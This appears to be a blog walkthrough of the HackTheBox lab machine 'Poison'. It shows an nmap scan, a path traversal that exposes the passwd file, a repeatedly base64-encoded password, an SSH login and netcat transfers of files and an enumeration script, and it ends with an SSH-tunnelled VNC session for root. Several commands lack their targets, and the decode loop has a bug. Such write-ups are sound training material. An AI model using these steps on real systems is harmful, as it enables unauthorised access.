One Eyed Techs WHOIS


HackTheBox: poison by charix

First of, let's scan the host with nmap.

root@kali:~# nmap -sV -sC -oA nmap
Starting Nmap 7.70 ( ) at 2018-09-09 08:29 EDT
Nmap scan report for
Host is up (0.050s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at
Nmap done: 1 IP address (1 host up) scanned in 18.35 seconds

Going to the ip returns a page with a script input, and a list of php scripts.

Let's try the

List Files

The last file - pwdbackup.txt looks interesting. Let's take a closer look on

Password Backup

Hmm, encoded 13 times. The equals sign in the end could indicate that it's base64 encoding. Decoding it 13 times with a simple python script returns the password. Remember, Charix, is the name of the creator of the box.

root@kali:~# python
Python 2.7.15 (default, Jul 28 2018, 11:29:29)
[GCC 8.1.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from base64 import b64decode
>>> a = open('base64.txt', 'r').read().strip()
>>> for i in range(13):
...     a = b64decode(f)
>>> a

Let's check if the server is vulnerable to path traversal. Entering let's us take a look at the users.


The server has not excluded the password file from being fetched from the web. This verifies that a user named Charix is existing on the server. Let's try to connect through ssh, with Charix!2#4%6&8(0 as password.

root@kali:~# ssh charix@
Password for charix@Poison: Charix!2#4%6&8(0
Last login: Sun Sep  9 18:46:10 2018 from
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
>> FreeBSD info <<
charix@Poison:~ % ls	user.txt
charix@Poison:~ % cat user.txt
charix@Poison:~ %

Piece of cake. Now, let's go for root.

A zip file named is located in the Charix directory. Let's copy it to our own machine to take a closer look.

root@kali:~# nc -l -p 1234 >
charix@Poison:~ % nc -w 3 1234 <

The zip can be extracted with the password: Charix!2#4%6&8(0.

root@kali:~# unzip
[] secret password: Charix!2#4%6&8(0
extracting: secret

When using cat to display the file content, Non-ISO extended-ASCII text is returned.

root@kali:~# file secret
secret: Non-ISO extended-ASCII text, with no line terminators

Dead end. For now. Let's look at the users and proccesses running on Poison.

There's a bash script called It enumerates local information on a Linux host. Let's transfer it through netcat and run it.

charix@Poison:~ % nc -l -p 1234 >
root@kali:~# nc -w 3 1234 <
charix@Poison:~ % sh

The bash script revaels xvnc running under processes. Jackpot. A quick google search returned this result

We'll try to pipe vnc through ssh and connect through vncviewer.

root@kali:~# ssh -NTL 9000: charix@
root@kali:~# vncviewer -compresslevel 0 -passwd secret

Aaand we're in. Cat root.txt and submit the flag.